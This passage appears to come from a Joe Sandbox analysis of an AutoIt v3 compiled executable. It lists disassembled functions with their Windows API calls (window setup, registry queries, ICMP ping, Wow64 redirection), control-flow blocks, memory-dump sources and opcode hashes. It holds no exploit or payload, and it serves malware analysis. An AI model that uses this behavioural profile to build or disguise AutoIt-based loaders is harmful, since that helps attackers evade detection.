                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandleMemoryProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2407445808-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                    • Instruction ID: 016821a7a4eaf3ea01914a28e57ff8ba16058255711124d2be1977b0e283b40b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9731C170A14109DBC718EE58D490B69FBE6FB49300F2486E5E409CB292E632EDC1CB80
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetInputState.USER32 ref: 00AEEF07
                                                                                                                                                                                                                                                                                    • timeGetTime.WINMM ref: 00AEF107
                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AEF228
                                                                                                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00AEF27B
                                                                                                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00AEF289
                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AEF29F
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00AEF2B1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
• String ID:
• API String ID: 2189390790-0
• Opcode ID: 477dea36bd41e6eb8de95a834a12feb00fcb04a8762b8d10e89a970c6c9e43b3
• Instruction ID: a2768a0480d47868677ae7a634d92db1576d80d3531ae40395409fbc3e21bba5
• Opcode Fuzzy Hash: 477dea36bd41e6eb8de95a834a12feb00fcb04a8762b8d10e89a970c6c9e43b3
• Instruction Fuzzy Hash: 6832F430604782EFD728CF25C884BAABBE5FF81704F24466DF55997291DB71E984CB82

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00AE3657
• RegisterClassExW.USER32(00000030), ref: 00AE3681
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AE3692
• InitCommonControlsEx.COMCTL32(?), ref: 00AE36AF
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AE36BF
• LoadIconW.USER32(000000A9), ref: 00AE36D5
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AE36E4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 422d4074771172113554033af56af69053cbf7930a5f1f1e35ce1a8fb8842635
• Instruction ID: b644bc7dc6c4bde5702a5b1108a0d204fa1f93a5b2ce08b73ec053df91c5bc83
• Opcode Fuzzy Hash: 422d4074771172113554033af56af69053cbf7930a5f1f1e35ce1a8fb8842635
• Instruction Fuzzy Hash: 7621C3B1D01258AFDB00DFA4EC89B9DBBB4FB08750F00521AF659A72A0DBB545848F95

Control-flow Graph

APIs
  • Part of subcall function 00B2071A: CreateFileW.KERNEL32(00000000,00000000,?,00B20A84,?,?,00000000,?,00B20A84,00000000,0000000C), ref: 00B20737
• GetLastError.KERNEL32 ref: 00B20AEF
• __dosmaperr.LIBCMT ref: 00B20AF6
• GetFileType.KERNEL32(00000000), ref: 00B20B02
• GetLastError.KERNEL32 ref: 00B20B0C
• __dosmaperr.LIBCMT ref: 00B20B15
• CloseHandle.KERNEL32(00000000), ref: 00B20B35
• CloseHandle.KERNEL32(?), ref: 00B20C7F
• GetLastError.KERNEL32 ref: 00B20CB1
• __dosmaperr.LIBCMT ref: 00B20CB8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: 32077f801906410839d2546dba3ee206f6ffeb62cfebee1af04726126a0d1bef
• Instruction ID: 0de6ec0e3de2d0c2d3104d1b2e9da7aa81bb70953e043299549c97b03bf6e70d
• Opcode Fuzzy Hash: 32077f801906410839d2546dba3ee206f6ffeb62cfebee1af04726126a0d1bef
• Instruction Fuzzy Hash: 63A12832A201198FDF29EF68E895BAD7BE1EB06324F140199F815DB2D2DB319C12CB51

Control-flow Graph

APIs
  • Part of subcall function 00AE5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00B24B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00AE55B2
  • Part of subcall function 00AE5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AE525A
• RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00AE53C4
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B24BFD
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B24C3E
• RegCloseKey.ADVAPI32(?), ref: 00B24C80
• _wcslen.LIBCMT ref: 00B24CE7
• _wcslen.LIBCMT ref: 00B24CF6
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 98802146-2727554177
• Opcode ID: 8e1e72da456e569b57baf57d3c266e848a5f3567403eed2570e8cf59f63613f9
• Instruction ID: 21576dba45e4308e7e972356a0e34de934f569556fefb20058c55ccecaf73101
• Opcode Fuzzy Hash: 8e1e72da456e569b57baf57d3c266e848a5f3567403eed2570e8cf59f63613f9
• Instruction Fuzzy Hash: 5B719C715143019FC300EF2AE9819ABBBF8FF58780F80496DF444871A0DFB19A49CB65

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00AE34DE
• LoadCursorW.USER32(00000000,00007F00), ref: 00AE34ED
• LoadIconW.USER32(00000063), ref: 00AE3503
• LoadIconW.USER32(000000A4), ref: 00AE3515
• LoadIconW.USER32(000000A2), ref: 00AE3527
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AE353F
• RegisterClassExW.USER32(?), ref: 00AE3590
  • Part of subcall function 00AE3624: GetSysColorBrush.USER32(0000000F), ref: 00AE3657
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE3624: RegisterClassExW.USER32(00000030), ref: 00AE3681
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AE3692
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE3624: InitCommonControlsEx.COMCTL32(?), ref: 00AE36AF
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AE36BF
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE3624: LoadIconW.USER32(000000A9), ref: 00AE36D5
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AE36E4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                                    • Opcode ID: 3a5975f5b81bf02b3201b9c4be5b38a826d88c1f82fcc4478b4c620dfb17d17b
                                                                                                                                                                                                                                                                                    • Instruction ID: 482f51e3d45351ceb790f6880b0e054f3e7fd8e06d6b17a3c7bcc274ed3a6f66
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a5975f5b81bf02b3201b9c4be5b38a826d88c1f82fcc4478b4c620dfb17d17b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53214F71D00354AFDB109FA5EC45BAABFF4FB08750F00451AE608A72A0CBF91985CF98

Control-flow Graph

control_flow_graph 510 b60fb8-b60fef call aee6a0 513 b60ff1-b60ffe call aec98d 510->513 514 b6100f-b61021 WSAStartup 510->514 513->514 525 b61000-b6100b call aec98d 513->525 515 b61054-b61091 call afc1f6 call ae8ec0 call aff9d4 inet_addr gethostbyname 514->515 516 b61023-b61031 514->516 533 b610a2-b610b0 515->533 534 b61093-b610a0 IcmpCreateFile 515->534 518 b61036-b61046 516->518 519 b61033 516->519 522 b6104b-b6104f 518->522 523 b61048 518->523 519->518 526 b61249-b61251 522->526 523->522 525->514 536 b610b5-b610c5 533->536 537 b610b2 533->537 534->533 535 b610d3-b61100 call b0017b call ae423c 534->535 546 b61102-b61129 IcmpSendEcho 535->546 547 b6112b-b61148 IcmpSendEcho 535->547 538 b610c7 536->538 539 b610ca-b610ce 536->539 537->536 538->539 541 b61240-b61244 call aebd98 539->541 541->526 548 b6114c-b6114e 546->548 547->548 549 b61150-b61155 548->549 550 b611ae-b611bc 548->550 553 b6115b-b61160 549->553 554 b611f8-b6120a call aee6a0 549->554 551 b611c1-b611c8 550->551 552 b611be 550->552 556 b611e4-b611ed 551->556 552->551 557 b61162-b61167 553->557 558 b611ca-b611d8 553->558 565 b61210 554->565 566 b6120c-b6120e 554->566 562 b611f2-b611f6 556->562 563 b611ef 556->563 557->550 564 b61169-b6116e 557->564 560 b611dd 558->560 561 b611da 558->561 560->556 561->560 567 b61212-b61229 IcmpCloseHandle WSACleanup 562->567 563->562 568 b61193-b611a1 564->568 569 b61170-b61175 564->569 565->567 566->567 567->541 573 b6122b-b6123d call b0013d call b00184 567->573 571 b611a6-b611ac 568->571 572 b611a3 568->572 569->558 570 b61177-b61185 569->570 574 b61187 570->574 575 b6118a-b61191 570->575 571->556 572->571 573->541 574->575 575->556
APIs
• WSAStartup.WS2_32(00000101,?), ref: 00B61019
• inet_addr.WSOCK32(?), ref: 00B61079
• gethostbyname.WS2_32(?), ref: 00B61085
• IcmpCreateFile.IPHLPAPI ref: 00B61093
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B61123
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B61142
• IcmpCloseHandle.IPHLPAPI(?), ref: 00B61216
• WSACleanup.WSOCK32 ref: 00B6121C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: 7ef0e916ba9fcc7c08caebad25bfd8b33fd75c24daf4f942a813faf395268578
• Instruction ID: a81a6983d8f021b72f30a52566297147b7d983ec5e7fdfa4433d1b4b5b14d6d9
• Opcode Fuzzy Hash: 7ef0e916ba9fcc7c08caebad25bfd8b33fd75c24daf4f942a813faf395268578
• Instruction Fuzzy Hash: 9C91BF316042419FD720DF29C889B16BBE0FF45318F1889A9F5699B6A2C739ED81CB81

Control-flow Graph

control_flow_graph 580 ae370f-ae3724 581 ae3726-ae3729 580->581 582 ae3784-ae3786 580->582 583 ae378a 581->583 584 ae372b-ae3732 581->584 582->581 585 ae3788 582->585 589 b23df4-b23e1c call ae2f92 call aff23c 583->589 590 ae3790-ae3795 583->590 586 ae3738-ae373d 584->586 587 ae3804-ae380c PostQuitMessage 584->587 588 ae376f-ae3777 DefWindowProcW 585->588 593 b23e61-b23e75 call b4c8f7 586->593 594 ae3743-ae3747 586->594 597 ae37b8-ae37ba 587->597 596 ae377d-ae3783 588->596 626 b23e21-b23e28 589->626 591 ae37bc-ae37e3 SetTimer RegisterWindowMessageW 590->591 592 ae3797-ae379a 590->592 591->597 600 ae37e5-ae37f0 CreatePopupMenu 591->600 598 b23d95-b23d98 592->598 599 ae37a0-ae37b3 KillTimer call ae3907 call ae59ff 592->599 593->597 619 b23e7b 593->619 601 ae380e-ae3818 call affcad 594->601 602 ae374d-ae3752 594->602 597->596 605 b23dd0-b23def MoveWindow 598->605 606 b23d9a-b23d9e 598->606 599->597 600->597 621 ae381d 601->621 608 b23e46-b23e4d 602->608 609 ae3758-ae375d 602->609 605->597 613 b23da0-b23da3 606->613 614 b23dbf-b23dcb SetFocus 606->614 608->588 616 b23e53-b23e5c call b41423 608->616 617 ae37f2-ae3802 call ae381f 609->617 618 ae3763-ae3769 609->618 613->618 622 b23da9-b23dba call ae2f92 613->622 614->597 616->588 617->597 618->588 618->626 619->588 621->597 622->597 626->588 630 b23e2e-b23e41 call ae3907 call ae396b 626->630 630->588
APIs
• DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00AE3709,?,?), ref: 00AE3777
• KillTimer.USER32(?,00000001,?,?,?,?,?,00AE3709,?,?), ref: 00AE37A3
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AE37C6
• RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00AE3709,?,?), ref: 00AE37D1
• CreatePopupMenu.USER32 ref: 00AE37E5
• PostQuitMessage.USER32(00000000), ref: 00AE3806
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated
• API String ID: 129472671-2362178303
• Opcode ID: 879e09f2f4cdd3903aefa8078d181995903465967fc3efe7ff4b2ca3c6c6a29d
• Instruction ID: bc6b33168be31a4051e9d906db9eb6cd9d1b213aa8072b17c60fd5dd0d936884
• Opcode Fuzzy Hash: 879e09f2f4cdd3903aefa8078d181995903465967fc3efe7ff4b2ca3c6c6a29d
• Instruction Fuzzy Hash: AE41E2F3604184BBDF14AB6A9D5DBB93BF5EB04300F000225F50987291CEF59F448761

Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 07a0b31bbbb9b7a418a2d14c736ed821ee662d47d13ce1d15d33f271591578ab
• Instruction ID: e7d6baa7e8e3636a0e5b00dbb002540cb0159573f14b8fb40ee979e310581773
• Opcode Fuzzy Hash: 07a0b31bbbb9b7a418a2d14c736ed821ee662d47d13ce1d15d33f271591578ab
• Instruction Fuzzy Hash: EBC1D270A04289AFDB21DFA8D865BED7BF0AF09310F9401D8E524A73D2C7319982CB61

Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID:
• String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
• API String ID: 0-4285391669
• Opcode ID: ebacda7c807afdd0ef147cf643b7380e83672367345ee5e42fe0435746e80679
• Instruction ID: 5e7e78a99946362ffdcd9bb6013d57748728836350bd3183d0efe6f77d2b3576
• Opcode Fuzzy Hash: ebacda7c807afdd0ef147cf643b7380e83672367345ee5e42fe0435746e80679
• Instruction Fuzzy Hash: 84624471508385CFC724DF24C185AAABBF0FF88344F108AAEE5998B351DB71E945CB92

APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AE35E1
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AE3602
• ShowWindow.USER32(00000000,?,?,?,?,?,?,00AE3368,?), ref: 00AE3616
• ShowWindow.USER32(00000000,?,?,?,?,?,?,00AE3368,?), ref: 00AE361F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: a621ba308ac320206cf25ff12844895fbb6fac0dc0aa17659726992fc4c79418
• Instruction ID: a3d5f92b64736efc6ed60bb771843a7c448f858c25ed8196104ac304aed6086b
• Opcode Fuzzy Hash: a621ba308ac320206cf25ff12844895fbb6fac0dc0aa17659726992fc4c79418
• Instruction Fuzzy Hash: 46F03A716002947FE7310713AC08E373EFDEBC6F50B04051EBA08AB1A0CAA91881DAB4

APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AE668B,?,?,00AE62FA,?,00000001,?,?,00000000), ref: 00AE664A
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AE665C
• FreeLibrary.KERNEL32(00000000,?,?,00AE668B,?,?,00AE62FA,?,00000001,?,?,00000000), ref: 00AE666E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 145871493-3689287502
• Opcode ID: e907b3503322e40cf9dd470812378bc6103b4aad027e01fadd362419d1b942c5
• Instruction ID: b4f4cf396b84842c1b4c1868aef458e38d3c5c134f53f38a5d2f0052679707c2
• Opcode Fuzzy Hash: e907b3503322e40cf9dd470812378bc6103b4aad027e01fadd362419d1b942c5
• Instruction Fuzzy Hash: 26E0C236A1666217D2222736BC0CBAE66B99FE2FE2F050215FC08F3210DFA0CC4185E5

Control-flow Graph

APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B25287
  • Part of subcall function 00AE8577: _wcslen.LIBCMT ref: 00AE858A
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AE6299
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_wcslen
• String ID: Line %d: $AutoIt -
• API String ID: 2289894680-4094128768
• Opcode ID: deaeb59a16904b0d7fb08e38925b3bb466179411e5e716d592d09db25d5086b1
• Instruction ID: 16c791640beb85c31ad4e151c778ccda554ef494a7b3a93634be51b25b7f5b1f
• Opcode Fuzzy Hash: deaeb59a16904b0d7fb08e38925b3bb466179411e5e716d592d09db25d5086b1
• Instruction Fuzzy Hash: 1341C171408344AEC321EB61EC45AEF7BECAF54360F004A2EF599830A1EF74D649C796

Control-flow Graph

(Graph image not captured; basic blocks: ae58cb-ae58d6 entry, ae58df-ae58f7 RegOpenKeyExW, ae58f9-ae5918 RegQueryValueExW, ae592f-ae593a RegCloseKey, exit blocks ae593b-ae593e and ae5948-ae594a.)

APIs
• RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00AE58BE,SwapMouseButtons,00000004,?), ref: 00AE58EF
• RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00AE58BE,SwapMouseButtons,00000004,?), ref: 00AE5910
• RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00AE58BE,SwapMouseButtons,00000004,?), ref: 00AE5932
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
• Opcode ID: 45eb8ce17c9c6b41a69535b8244107d1f189d173f392348e68749e297990b49c
• Instruction ID: 4fd8aa884ccf6cd151ef48ae9ce283b1dcd11b522572bcbb0d68da1f493932ce
